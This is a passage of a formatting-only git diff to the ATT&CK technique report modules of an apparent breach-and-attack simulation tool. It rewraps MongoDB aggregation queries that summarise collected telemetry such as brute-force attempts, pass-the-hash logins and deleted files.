- query = [{'$match': {'telem_category': 'attack', - 'data.technique': tech_id}}, - {'$lookup': {'from': 'monkey', - 'localField': 'monkey_guid', - 'foreignField': 'guid', - 'as': 'monkey'}}, - {'$project': {'monkey': {'$arrayElemAt': ['$monkey', 0]}, - 'status': '$data.status', - 'gathered_data_type': '$data.gathered_data_type', - 'info': '$data.info'}}, - {'$addFields': {'_id': 0, - 'machine': {'hostname': '$monkey.hostname', 'ips': '$monkey.ip_addresses'}, - 'monkey': 0}}, - {'$group': {'_id': {'machine': '$machine', 'gathered_data_type': '$gathered_data_type', 'info': '$info'}}}, - {"$replaceRoot": {"newRoot": "$_id"}}] + query = [ + {"$match": {"telem_category": "attack", "data.technique": tech_id}}, + { + "$lookup": { + "from": "monkey", + "localField": "monkey_guid", + "foreignField": "guid", + "as": "monkey", + } + }, + { + "$project": { + "monkey": {"$arrayElemAt": ["$monkey", 0]}, + "status": "$data.status", + "gathered_data_type": "$data.gathered_data_type", + "info": "$data.info", + } + }, + { + "$addFields": { + "_id": 0, + "machine": {"hostname": "$monkey.hostname", "ips": "$monkey.ip_addresses"}, + "monkey": 0, + } + }, + { + "$group": { + "_id": { + "machine": "$machine", + "gathered_data_type": "$gathered_data_type", + "info": "$info", + } + } + }, + {"$replaceRoot": {"newRoot": "$_id"}}, + ] @staticmethod def get_report_data(): data = T1005.get_tech_base_data() - data.update({'collected_data': list(mongo.db.telemetry.aggregate(T1005.query))}) + data.update({"collected_data": list(mongo.db.telemetry.aggregate(T1005.query))}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py index a1162b109..594c593d5 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py @@ -11,19 +11,37 @@ class T1016(AttackTechnique): scanned_msg = "" used_msg = "Monkey gathered network configurations on systems in the network." 
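The reformatted T1005 pipeline above is the dedup idiom these report classes rely on: $lookup joins the monkey document, $arrayElemAt flattens the join, and a $group over the whole projected shape followed by $replaceRoot collapses duplicates. A trimmed sketch of that idiom with the same collection and field names as the diff; connection details are assumed:

from pymongo import MongoClient

db = MongoClient("mongodb://localhost:27017")["monkeyisland"]  # assumed connection details

pipeline = [
    {"$match": {"telem_category": "attack", "data.technique": "T1005"}},
    {
        "$lookup": {
            "from": "monkey",
            "localField": "monkey_guid",
            "foreignField": "guid",
            "as": "monkey",
        }
    },
    # The join returns an array; keep only the first (and only) matching monkey.
    {"$project": {"monkey": {"$arrayElemAt": ["$monkey", 0]}, "info": "$data.info"}},
    # Group on the full shape, then promote it back to the root: each distinct
    # (hostname, info) pair survives exactly once.
    {"$group": {"_id": {"hostname": "$monkey.hostname", "info": "$info"}}},
    {"$replaceRoot": {"newRoot": "$_id"}},
]

collected = list(db.telemetry.aggregate(pipeline))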
- query = [{'$match': {'telem_category': 'system_info', 'data.network_info': {'$exists': True}}}, - {'$project': {'machine': {'hostname': '$data.hostname', 'ips': '$data.network_info.networks'}, - 'networks': '$data.network_info.networks', - 'netstat': '$data.network_info.netstat'}}, - {'$addFields': {'_id': 0, - 'netstat': 0, - 'networks': 0, - 'info': [ - {'used': {'$and': [{'$ifNull': ['$netstat', False]}, {'$gt': ['$netstat', {}]}]}, - 'name': {'$literal': 'Network connections (netstat)'}}, - {'used': {'$and': [{'$ifNull': ['$networks', False]}, {'$gt': ['$networks', {}]}]}, - 'name': {'$literal': 'Network interface info'}}, - ]}}] + query = [ + {"$match": {"telem_category": "system_info", "data.network_info": {"$exists": True}}}, + { + "$project": { + "machine": {"hostname": "$data.hostname", "ips": "$data.network_info.networks"}, + "networks": "$data.network_info.networks", + "netstat": "$data.network_info.netstat", + } + }, + { + "$addFields": { + "_id": 0, + "netstat": 0, + "networks": 0, + "info": [ + { + "used": { + "$and": [{"$ifNull": ["$netstat", False]}, {"$gt": ["$netstat", {}]}] + }, + "name": {"$literal": "Network connections (netstat)"}, + }, + { + "used": { + "$and": [{"$ifNull": ["$networks", False]}, {"$gt": ["$networks", {}]}] + }, + "name": {"$literal": "Network interface info"}, + }, + ], + } + }, + ] @staticmethod def get_report_data(): @@ -36,5 +54,5 @@ class T1016(AttackTechnique): status, network_info = get_technique_status_and_data() data = T1016.get_base_data_by_status(status) - data.update({'network_info': network_info}) + data.update({"network_info": network_info}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py index 3ea49603c..500a1a325 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py @@ -11,20 +11,33 @@ class T1018(AttackTechnique): scanned_msg = "" used_msg = "Monkey found machines on the network." 
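T1016 above builds its info list from computed booleans: $ifNull maps a missing field to False and $gt against an empty document checks that the field actually holds data; the same check reappears in T1082 further down. The expression can be tried in isolation; the sandbox database, the process_list field, and the sample documents below are made up for illustration:

from pymongo import MongoClient

db = MongoClient("mongodb://localhost:27017")["sandbox"]  # throwaway database, assumed
db.samples.delete_many({})
db.samples.insert_many(
    [
        {"hostname": "a", "process_list": {"1": "init", "42": "sshd"}},  # non-empty dict
        {"hostname": "b", "process_list": {}},  # empty dict
        {"hostname": "c"},  # field missing entirely
    ]
)

pipeline = [
    {
        "$addFields": {
            # $ifNull turns a missing field into False; $gt against {} is true only
            # for a non-empty document, so only hostname "a" ends up flagged.
            "used": {
                "$and": [
                    {"$ifNull": ["$process_list", False]},
                    {"$gt": ["$process_list", {}]},
                ]
            }
        }
    },
    {"$project": {"_id": 0, "hostname": 1, "used": 1}},
]
print(list(db.samples.aggregate(pipeline)))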
- query = [{'$match': {'telem_category': 'scan'}}, - {'$sort': {'timestamp': 1}}, - {'$group': {'_id': {'monkey_guid': '$monkey_guid'}, - 'machines': {'$addToSet': '$data.machine'}, - 'started': {'$first': '$timestamp'}, - 'finished': {'$last': '$timestamp'}}}, - {'$lookup': {'from': 'monkey', - 'localField': '_id.monkey_guid', - 'foreignField': 'guid', - 'as': 'monkey_tmp'}}, - {'$addFields': {'_id': 0, 'monkey_tmp': {'$arrayElemAt': ['$monkey_tmp', 0]}}}, - {'$addFields': {'monkey': {'hostname': '$monkey_tmp.hostname', - 'ips': '$monkey_tmp.ip_addresses'}, - 'monkey_tmp': 0}}] + query = [ + {"$match": {"telem_category": "scan"}}, + {"$sort": {"timestamp": 1}}, + { + "$group": { + "_id": {"monkey_guid": "$monkey_guid"}, + "machines": {"$addToSet": "$data.machine"}, + "started": {"$first": "$timestamp"}, + "finished": {"$last": "$timestamp"}, + } + }, + { + "$lookup": { + "from": "monkey", + "localField": "_id.monkey_guid", + "foreignField": "guid", + "as": "monkey_tmp", + } + }, + {"$addFields": {"_id": 0, "monkey_tmp": {"$arrayElemAt": ["$monkey_tmp", 0]}}}, + { + "$addFields": { + "monkey": {"hostname": "$monkey_tmp.hostname", "ips": "$monkey_tmp.ip_addresses"}, + "monkey_tmp": 0, + } + }, + ] @staticmethod def get_report_data(): @@ -40,5 +53,5 @@ class T1018(AttackTechnique): status, scan_info = get_technique_status_and_data() data = T1018.get_base_data_by_status(status) - data.update({'scan_info': scan_info}) + data.update({"scan_info": scan_info}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py index b017e7c85..9fe32b4d5 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py @@ -13,22 +13,26 @@ class T1021(AttackTechnique): used_msg = "Monkey successfully logged into remote services on the network." 
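T1018's pipeline above relies on $first and $last respecting the preceding $sort: after sorting scan telemetries by timestamp, grouping by monkey_guid yields each monkey's set of discovered machines plus when its scan started and finished. A condensed version of just that grouping; connection details are assumed:

from pymongo import MongoClient

db = MongoClient("mongodb://localhost:27017")["monkeyisland"]  # assumed connection details

pipeline = [
    {"$match": {"telem_category": "scan"}},
    {"$sort": {"timestamp": 1}},
    {
        "$group": {
            "_id": {"monkey_guid": "$monkey_guid"},
            "machines": {"$addToSet": "$data.machine"},  # unique machines per monkey
            "started": {"$first": "$timestamp"},  # earliest scan telemetry
            "finished": {"$last": "$timestamp"},  # latest scan telemetry
        }
    },
]

for row in db.telemetry.aggregate(pipeline):
    print(row["_id"]["monkey_guid"], len(row["machines"]), row["started"], row["finished"])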
# Gets data about brute force attempts - query = [{'$match': {'telem_category': 'exploit', - 'data.attempts': {'$not': {'$size': 0}}}}, - {'$project': {'_id': 0, - 'machine': '$data.machine', - 'info': '$data.info', - 'attempt_cnt': {'$size': '$data.attempts'}, - 'attempts': {'$filter': {'input': '$data.attempts', - 'as': 'attempt', - 'cond': {'$eq': ['$$attempt.result', True]} - } - } - } - }] + query = [ + {"$match": {"telem_category": "exploit", "data.attempts": {"$not": {"$size": 0}}}}, + { + "$project": { + "_id": 0, + "machine": "$data.machine", + "info": "$data.info", + "attempt_cnt": {"$size": "$data.attempts"}, + "attempts": { + "$filter": { + "input": "$data.attempts", + "as": "attempt", + "cond": {"$eq": ["$$attempt.result", True]}, + } + }, + } + }, + ] - scanned_query = {'telem_category': 'exploit', - 'data.attempts': {'$elemMatch': {'result': True}}} + scanned_query = {"telem_category": "exploit", "data.attempts": {"$elemMatch": {"result": True}}} @staticmethod def get_report_data(): @@ -40,9 +44,9 @@ class T1021(AttackTechnique): if attempts: status = ScanStatus.USED.value for result in attempts: - result['successful_creds'] = [] - for attempt in result['attempts']: - result['successful_creds'].append(parse_creds(attempt)) + result["successful_creds"] = [] + for attempt in result["attempts"]: + result["successful_creds"].append(parse_creds(attempt)) else: status = ScanStatus.SCANNED.value else: @@ -52,5 +56,5 @@ class T1021(AttackTechnique): status, attempts = get_technique_status_and_data() data = T1021.get_base_data_by_status(status) - data.update({'services': attempts}) + data.update({"services": attempts}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1035.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1035.py index e0694f3b4..d11a74b31 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1035.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1035.py @@ -12,5 +12,5 @@ class T1035(UsageTechnique): @staticmethod def get_report_data(): data = T1035.get_tech_base_data() - data.update({'services': T1035.get_usage_data()}) + data.update({"services": T1035.get_usage_data()}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py index b4548dac8..262c18204 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py @@ -16,9 +16,14 @@ class T1041(AttackTechnique): @T1041.is_status_disabled def get_technique_status_and_data(): monkeys = list(Monkey.objects()) - info = [{'src': monkey['command_control_channel']['src'], - 'dst': monkey['command_control_channel']['dst']} - for monkey in monkeys if monkey['command_control_channel']] + info = [ + { + "src": monkey["command_control_channel"]["src"], + "dst": monkey["command_control_channel"]["dst"], + } + for monkey in monkeys + if monkey["command_control_channel"] + ] if info: status = ScanStatus.USED.value else: @@ -28,5 +33,5 @@ class T1041(AttackTechnique): status, info = get_technique_status_and_data() data = T1041.get_base_data_by_status(status) - data.update({'command_control_channel': info}) + data.update({"command_control_channel": info}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1053.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1053.py index 7ab1b5607..5e1944ff7 100644 --- 
a/monkey/monkey_island/cc/services/attack/technique_reports/T1053.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1053.py @@ -6,7 +6,9 @@ __author__ = "shreyamalviya" class T1053(PostBreachTechnique): tech_id = "T1053" - unscanned_msg = "Monkey didn't try scheduling a job on Windows since it didn't run on any Windows machines." + unscanned_msg = ( + "Monkey didn't try scheduling a job on Windows since it didn't run on any Windows machines." + ) scanned_msg = "Monkey tried scheduling a job on the Windows system but failed." used_msg = "Monkey scheduled a job on the Windows system." pba_names = [POST_BREACH_JOB_SCHEDULING] diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py index b702ddd58..dc97ef85b 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py @@ -11,15 +11,19 @@ class T1059(AttackTechnique): scanned_msg = "" used_msg = "Monkey successfully ran commands on exploited machines in the network." - query = [{'$match': {'telem_category': 'exploit', - 'data.info.executed_cmds': {'$exists': True, '$ne': []}}}, - {'$unwind': '$data.info.executed_cmds'}, - {'$sort': {'data.info.executed_cmds.powershell': 1}}, - {'$project': {'_id': 0, - 'machine': '$data.machine', - 'info': '$data.info'}}, - {'$group': {'_id': '$machine', 'data': {'$push': '$$ROOT'}}}, - {'$project': {'_id': 0, 'data': {'$arrayElemAt': ['$data', 0]}}}] + query = [ + { + "$match": { + "telem_category": "exploit", + "data.info.executed_cmds": {"$exists": True, "$ne": []}, + } + }, + {"$unwind": "$data.info.executed_cmds"}, + {"$sort": {"data.info.executed_cmds.powershell": 1}}, + {"$project": {"_id": 0, "machine": "$data.machine", "info": "$data.info"}}, + {"$group": {"_id": "$machine", "data": {"$push": "$$ROOT"}}}, + {"$project": {"_id": 0, "data": {"$arrayElemAt": ["$data", 0]}}}, + ] @staticmethod def get_report_data(): @@ -33,7 +37,7 @@ class T1059(AttackTechnique): return (status, cmd_data) status, cmd_data = get_technique_status_and_data() - data = {'title': T1059.technique_title(), 'cmds': cmd_data} + data = {"title": T1059.technique_title(), "cmds": cmd_data} data.update(T1059.get_message_and_status(status)) data.update(T1059.get_mitigation_by_status(status)) diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1064.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1064.py index 2c68c9ae4..1ca2ba62e 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1064.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1064.py @@ -14,5 +14,5 @@ class T1064(UsageTechnique): def get_report_data(): data = T1064.get_tech_base_data() script_usages = list(mongo.db.telemetry.aggregate(T1064.get_usage_query())) - data.update({'scripts': script_usages}) + data.update({"scripts": script_usages}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py index 3b18be488..7734eb782 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py @@ -16,6 +16,6 @@ class T1065(AttackTechnique): @staticmethod def get_report_data(): - port = ConfigService.get_config_value(CURRENT_SERVER_PATH).split(':')[1] + port = ConfigService.get_config_value(CURRENT_SERVER_PATH).split(":")[1] 
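The T1065 hunk that closes this chunk takes the island's "host:port" server string, splits off the port, and (in the continuation just below) interpolates it into the technique message. A tiny illustration of that parsing; the server value and the message template are stand-ins, not the real configuration or the real T1065.message text:

# Stand-in for ConfigService.get_config_value(CURRENT_SERVER_PATH), which returns the
# server string the agent reports to, e.g. "10.0.0.1:5000".
current_server = "10.0.0.1:5000"
port = current_server.split(":")[1]

# Placeholder template; the real T1065.message is defined elsewhere in the class.
message_template = "Monkey communicated over uncommon port %s."
print(message_template % port)  # Monkey communicated over uncommon port 5000.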
T1065.used_msg = T1065.message % port return T1065.get_base_data_by_status(ScanStatus.USED.value) diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py index 5d3f270e7..36c409531 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py @@ -7,26 +7,50 @@ __author__ = "VakarisZ" class T1075(AttackTechnique): tech_id = "T1075" - unscanned_msg = "Monkey didn't try to use pass the hash attack since it didn't run on any Windows machines." + unscanned_msg = ( + "Monkey didn't try to use pass the hash attack since it didn't run on any Windows machines." + ) scanned_msg = "Monkey tried to use hashes while logging in but didn't succeed." used_msg = "Monkey successfully used hashed credentials." - login_attempt_query = {'data.attempts': {'$elemMatch': {'$or': [{'ntlm_hash': {'$ne': ''}}, - {'lm_hash': {'$ne': ''}}]}}} + login_attempt_query = { + "data.attempts": { + "$elemMatch": {"$or": [{"ntlm_hash": {"$ne": ""}}, {"lm_hash": {"$ne": ""}}]} + } + } # Gets data about successful PTH logins - query = [{'$match': {'telem_category': 'exploit', - 'data.attempts': {'$not': {'$size': 0}, - '$elemMatch': {'$and': [{'$or': [{'ntlm_hash': {'$ne': ''}}, - {'lm_hash': {'$ne': ''}}]}, - {'result': True}]}}}}, - {'$project': {'_id': 0, - 'machine': '$data.machine', - 'info': '$data.info', - 'attempt_cnt': {'$size': '$data.attempts'}, - 'attempts': {'$filter': {'input': '$data.attempts', - 'as': 'attempt', - 'cond': {'$eq': ['$$attempt.result', True]}}}}}] + query = [ + { + "$match": { + "telem_category": "exploit", + "data.attempts": { + "$not": {"$size": 0}, + "$elemMatch": { + "$and": [ + {"$or": [{"ntlm_hash": {"$ne": ""}}, {"lm_hash": {"$ne": ""}}]}, + {"result": True}, + ] + }, + }, + } + }, + { + "$project": { + "_id": 0, + "machine": "$data.machine", + "info": "$data.info", + "attempt_cnt": {"$size": "$data.attempts"}, + "attempts": { + "$filter": { + "input": "$data.attempts", + "as": "attempt", + "cond": {"$eq": ["$$attempt.result", True]}, + } + }, + } + }, + ] @staticmethod def get_report_data(): @@ -42,8 +66,8 @@ class T1075(AttackTechnique): return (status, successful_logins) status, successful_logins = get_technique_status_and_data() - data = {'title': T1075.technique_title()} - data.update({'successful_logins': successful_logins}) + data = {"title": T1075.technique_title()} + data.update({"successful_logins": successful_logins}) data.update(T1075.get_message_and_status(status)) data.update(T1075.get_mitigation_by_status(status)) diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py index 1a9ff94f8..7025a658c 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py @@ -11,30 +11,63 @@ class T1082(AttackTechnique): scanned_msg = "" used_msg = "Monkey gathered system info from machines in the network." 
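The T1075 hunks above define two pass-the-hash queries: login_attempt_query matches any exploit attempt that carried an NTLM or LM hash, and the aggregation keeps only attempts where such a hash actually logged in (result: True). The nested $elemMatch / $and / $or shape can be exercised on its own; the filters below are adapted from the diff and the connection details are assumed:

from pymongo import MongoClient

db = MongoClient("mongodb://localhost:27017")["monkeyisland"]  # assumed connection details

# At least one attempt carried a hash, successful or not.
attempted_pth = {
    "telem_category": "exploit",
    "data.attempts": {
        "$elemMatch": {"$or": [{"ntlm_hash": {"$ne": ""}}, {"lm_hash": {"$ne": ""}}]}
    },
}

# At least one hash-based attempt also succeeded.
successful_pth = {
    "telem_category": "exploit",
    "data.attempts": {
        "$elemMatch": {
            "$and": [
                {"$or": [{"ntlm_hash": {"$ne": ""}}, {"lm_hash": {"$ne": ""}}]},
                {"result": True},
            ]
        }
    },
}

print(db.telemetry.count_documents(attempted_pth))
print(db.telemetry.count_documents(successful_pth))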
- query = [{'$match': {'telem_category': 'system_info', 'data.network_info': {'$exists': True}}}, - {'$project': {'machine': {'hostname': '$data.hostname', 'ips': '$data.network_info.networks'}, - 'aws': '$data.aws', - 'netstat': '$data.network_info.netstat', - 'process_list': '$data.process_list', - 'ssh_info': '$data.ssh_info', - 'azure_info': '$data.Azure'}}, - {'$project': {'_id': 0, - 'machine': 1, - 'collections': [ - {'used': {'$and': [{'$ifNull': ['$netstat', False]}, {'$gt': ['$aws', {}]}]}, - 'name': {'$literal': 'Amazon Web Services info'}}, - {'used': {'$and': [{'$ifNull': ['$process_list', False]}, - {'$gt': ['$process_list', {}]}]}, - 'name': {'$literal': 'Running process list'}}, - {'used': {'$and': [{'$ifNull': ['$netstat', False]}, {'$ne': ['$netstat', []]}]}, - 'name': {'$literal': 'Network connections'}}, - {'used': {'$and': [{'$ifNull': ['$ssh_info', False]}, {'$ne': ['$ssh_info', []]}]}, - 'name': {'$literal': 'SSH info'}}, - {'used': {'$and': [{'$ifNull': ['$azure_info', False]}, {'$ne': ['$azure_info', []]}]}, - 'name': {'$literal': 'Azure info'}} - ]}}, - {'$group': {'_id': {'machine': '$machine', 'collections': '$collections'}}}, - {"$replaceRoot": {"newRoot": "$_id"}}] + query = [ + {"$match": {"telem_category": "system_info", "data.network_info": {"$exists": True}}}, + { + "$project": { + "machine": {"hostname": "$data.hostname", "ips": "$data.network_info.networks"}, + "aws": "$data.aws", + "netstat": "$data.network_info.netstat", + "process_list": "$data.process_list", + "ssh_info": "$data.ssh_info", + "azure_info": "$data.Azure", + } + }, + { + "$project": { + "_id": 0, + "machine": 1, + "collections": [ + { + "used": {"$and": [{"$ifNull": ["$netstat", False]}, {"$gt": ["$aws", {}]}]}, + "name": {"$literal": "Amazon Web Services info"}, + }, + { + "used": { + "$and": [ + {"$ifNull": ["$process_list", False]}, + {"$gt": ["$process_list", {}]}, + ] + }, + "name": {"$literal": "Running process list"}, + }, + { + "used": { + "$and": [{"$ifNull": ["$netstat", False]}, {"$ne": ["$netstat", []]}] + }, + "name": {"$literal": "Network connections"}, + }, + { + "used": { + "$and": [{"$ifNull": ["$ssh_info", False]}, {"$ne": ["$ssh_info", []]}] + }, + "name": {"$literal": "SSH info"}, + }, + { + "used": { + "$and": [ + {"$ifNull": ["$azure_info", False]}, + {"$ne": ["$azure_info", []]}, + ] + }, + "name": {"$literal": "Azure info"}, + }, + ], + } + }, + {"$group": {"_id": {"machine": "$machine", "collections": "$collections"}}}, + {"$replaceRoot": {"newRoot": "$_id"}}, + ] @staticmethod def get_report_data(): @@ -48,8 +81,8 @@ class T1082(AttackTechnique): return (status, system_info) status, system_info = get_technique_status_and_data() - data = {'title': T1082.technique_title()} - data.update({'system_info': system_info}) + data = {"title": T1082.technique_title()} + data.update({"system_info": system_info}) data.update(T1082.get_mitigation_by_status(status)) data.update(T1082.get_message_and_status(status)) diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py index d6237a3f7..d034d5316 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py @@ -11,17 +11,30 @@ class T1086(AttackTechnique): scanned_msg = "" used_msg = "Monkey successfully ran powershell commands on exploited machines in the network." 
- query = [{'$match': {'telem_category': 'exploit', - 'data.info.executed_cmds': {'$elemMatch': {'powershell': True}}}}, - {'$project': {'machine': '$data.machine', - 'info': '$data.info'}}, - {'$project': {'_id': 0, - 'machine': 1, - 'info.finished': 1, - 'info.executed_cmds': {'$filter': {'input': '$info.executed_cmds', - 'as': 'command', - 'cond': {'$eq': ['$$command.powershell', True]}}}}}, - {'$group': {'_id': '$machine', 'data': {'$push': '$$ROOT'}}}] + query = [ + { + "$match": { + "telem_category": "exploit", + "data.info.executed_cmds": {"$elemMatch": {"powershell": True}}, + } + }, + {"$project": {"machine": "$data.machine", "info": "$data.info"}}, + { + "$project": { + "_id": 0, + "machine": 1, + "info.finished": 1, + "info.executed_cmds": { + "$filter": { + "input": "$info.executed_cmds", + "as": "command", + "cond": {"$eq": ["$$command.powershell", True]}, + } + }, + } + }, + {"$group": {"_id": "$machine", "data": {"$push": "$$ROOT"}}}, + ] @staticmethod def get_report_data(): @@ -35,7 +48,7 @@ class T1086(AttackTechnique): return (status, cmd_data) status, cmd_data = get_technique_status_and_data() - data = {'title': T1086.technique_title(), 'cmds': cmd_data} + data = {"title": T1086.technique_title(), "cmds": cmd_data} data.update(T1086.get_mitigation_by_status(status)) data.update(T1086.get_message_and_status(status)) diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py index f68ab1166..66078e0d0 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py @@ -23,5 +23,5 @@ class T1090(AttackTechnique): status, monkeys = get_technique_status_and_data() data = T1090.get_base_data_by_status(status) - data.update({'proxies': monkeys}) + data.update({"proxies": monkeys}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py index 832976617..edcca2c2d 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py @@ -10,17 +10,22 @@ class T1105(AttackTechnique): scanned_msg = "Monkey tried to copy files, but failed." used_msg = "Monkey successfully copied files to systems on the network." 
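T1086's pipeline at the top of this chunk pairs $elemMatch (select telemetries that ran at least one PowerShell command) with $filter (drop the non-PowerShell entries from executed_cmds before grouping per machine). Just the filter step, run against a fabricated document in a throwaway database:

from pymongo import MongoClient

db = MongoClient("mongodb://localhost:27017")["sandbox"]  # throwaway database, assumed
db.exploits.delete_many({})
db.exploits.insert_one(
    {
        "machine": {"ip_addr": "10.0.0.7"},
        "info": {
            "executed_cmds": [
                {"cmd": "whoami", "powershell": False},
                {"cmd": "Get-Process", "powershell": True},
            ]
        },
    }
)

pipeline = [
    {"$match": {"info.executed_cmds": {"$elemMatch": {"powershell": True}}}},
    {
        "$project": {
            "_id": 0,
            "machine": 1,
            "info.executed_cmds": {
                "$filter": {
                    "input": "$info.executed_cmds",
                    "as": "command",
                    "cond": {"$eq": ["$$command.powershell", True]},
                }
            },
        }
    },
]
print(list(db.exploits.aggregate(pipeline)))  # only the Get-Process entry remains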
- query = [{'$match': {'telem_category': 'attack', - 'data.technique': tech_id}}, - {'$project': {'_id': 0, - 'src': '$data.src', - 'dst': '$data.dst', - 'filename': '$data.filename'}}, - {'$group': {'_id': {'src': '$src', 'dst': '$dst', 'filename': '$filename'}}}, - {"$replaceRoot": {"newRoot": "$_id"}}] + query = [ + {"$match": {"telem_category": "attack", "data.technique": tech_id}}, + { + "$project": { + "_id": 0, + "src": "$data.src", + "dst": "$data.dst", + "filename": "$data.filename", + } + }, + {"$group": {"_id": {"src": "$src", "dst": "$dst", "filename": "$filename"}}}, + {"$replaceRoot": {"newRoot": "$_id"}}, + ] @staticmethod def get_report_data(): data = T1105.get_tech_base_data() - data.update({'files': list(mongo.db.telemetry.aggregate(T1105.query))}) + data.update({"files": list(mongo.db.telemetry.aggregate(T1105.query))}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1106.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1106.py index d07a66038..0dfc749cc 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1106.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1106.py @@ -12,5 +12,5 @@ class T1106(UsageTechnique): @staticmethod def get_report_data(): data = T1106.get_tech_base_data() - data.update({'api_uses': T1106.get_usage_data()}) + data.update({"api_uses": T1106.get_usage_data()}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1107.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1107.py index 9448c2e6b..18f3a047b 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1107.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1107.py @@ -10,23 +10,36 @@ class T1107(AttackTechnique): scanned_msg = "Monkey tried to delete files on systems in the network, but failed." used_msg = "Monkey successfully deleted files on systems in the network." 
- query = [{'$match': {'telem_category': 'attack', - 'data.technique': 'T1107'}}, - {'$lookup': {'from': 'monkey', - 'localField': 'monkey_guid', - 'foreignField': 'guid', - 'as': 'monkey'}}, - {'$project': {'monkey': {'$arrayElemAt': ['$monkey', 0]}, - 'status': '$data.status', - 'path': '$data.path'}}, - {'$addFields': {'_id': 0, - 'machine': {'hostname': '$monkey.hostname', 'ips': '$monkey.ip_addresses'}, - 'monkey': 0}}, - {'$group': {'_id': {'machine': '$machine', 'status': '$status', 'path': '$path'}}}] + query = [ + {"$match": {"telem_category": "attack", "data.technique": "T1107"}}, + { + "$lookup": { + "from": "monkey", + "localField": "monkey_guid", + "foreignField": "guid", + "as": "monkey", + } + }, + { + "$project": { + "monkey": {"$arrayElemAt": ["$monkey", 0]}, + "status": "$data.status", + "path": "$data.path", + } + }, + { + "$addFields": { + "_id": 0, + "machine": {"hostname": "$monkey.hostname", "ips": "$monkey.ip_addresses"}, + "monkey": 0, + } + }, + {"$group": {"_id": {"machine": "$machine", "status": "$status", "path": "$path"}}}, + ] @staticmethod def get_report_data(): data = T1107.get_tech_base_data() deleted_files = list(mongo.db.telemetry.aggregate(T1107.query)) - data.update({'deleted_files': deleted_files}) + data.update({"deleted_files": deleted_files}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py index 63e6ba26f..118371ac5 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py @@ -13,15 +13,24 @@ class T1110(AttackTechnique): used_msg = "Monkey successfully used brute force in the network." # Gets data about brute force attempts - query = [{'$match': {'telem_category': 'exploit', - 'data.attempts': {'$not': {'$size': 0}}}}, - {'$project': {'_id': 0, - 'machine': '$data.machine', - 'info': '$data.info', - 'attempt_cnt': {'$size': '$data.attempts'}, - 'attempts': {'$filter': {'input': '$data.attempts', - 'as': 'attempt', - 'cond': {'$eq': ['$$attempt.result', True]}}}}}] + query = [ + {"$match": {"telem_category": "exploit", "data.attempts": {"$not": {"$size": 0}}}}, + { + 